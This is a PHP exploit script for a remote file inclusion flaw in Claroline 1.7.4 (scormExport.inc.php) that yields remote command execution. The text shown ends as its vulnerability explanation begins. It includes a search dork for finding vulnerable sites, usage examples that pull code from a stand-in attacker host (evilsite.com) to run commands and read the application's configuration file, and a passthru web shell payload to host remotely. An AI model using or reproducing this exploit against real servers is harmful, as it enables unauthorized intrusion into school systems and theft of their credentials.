1 #!/usr/bin/php −q −d short_open_tag=on
2 <?
3 echo "Claroline <= 1.7.4 \"scormExport.inc.php\" remote cmmnds xctn\r\n";
4 echo "by rgod rgod@autistici.org\r\n";
5 echo "site: http://retrogod.altervista.org\r\n\r\n";
6 echo "−> works with register_globals = On & allow_url_fopen = On\r\n\r\n";
7 echo "dork: \"Powered by Claroline\" −demo\r\n\r\n";
8
9 if ($argc<5) {
10 echo "Usage: php ".$argv[0]." host path location OPTIONS\r\n";
11 echo "host: target server (ip/hostname)\r\n";
12 echo "path: path to claroline\r\n";
13 echo "location: arbitrary location with the code to include\r\n";
14 echo "Options:\r\n";
15 echo " −p[port]: specify a port other than 80\r\n";
16 echo " −P[ip:port]: specify a proxy\r\n";
17 echo "Examples:\r\n";
18 echo "php ".$argv[0]." target.com /claroline174/ http://evilsite.com ls −la\r\n";
19 echo "php ".$argv[0]." target.com /claroline174/ http://evilsite.com cat ./..\r\n";
20 echo "/../inc/conf/claro_main.conf.php −p81\r\n";
21 echo "php ".$argv[0]." target.com / http://evilsite.com uname −a −P1.1.1.1:80\r\n\r\n";
22 echo "note, on remote location you need a\r\n";
23 echo "/lib/fileUpload.lib.php/index.html\r\n";
24 echo "or a\r\n";
25 echo "/lib/pclzip/pclzip.lib.php/index.html\r\n";
26 echo "with this code inside:\r\n\r\n";
27 echo "<?php\r\n";
28 echo ’if (get_magic_quotes_gpc()){$_GET[cmd]=strisplashes($_GET[cmd]);}’."\r\n";
29 echo "error_reporting(0);\r\n";
30 echo ’ini_set("max_execution_time",0);’."\r\n";
31 echo ’echo "*delim*";’."\r\n";
32 echo ’passthru($_GET[cmd]);’."\r\n";
33 echo ’echo "*delim*";’."\r\n";
34 echo "die;\r\n";
35 echo ’?>’."\r\n";
36 die;
37 }
38
39 /*
40 explaination:
41 software site: http://www.claroline.net/
42 description: Claroline is a free application based on PHP/MySQL allowing
43 teachers or education organizations to create and administrate
44
courses through the web.
45
46 vulnerabilities:
47
48 i) system disclosure:
49 without to have an account you can see (not modify or include) all fil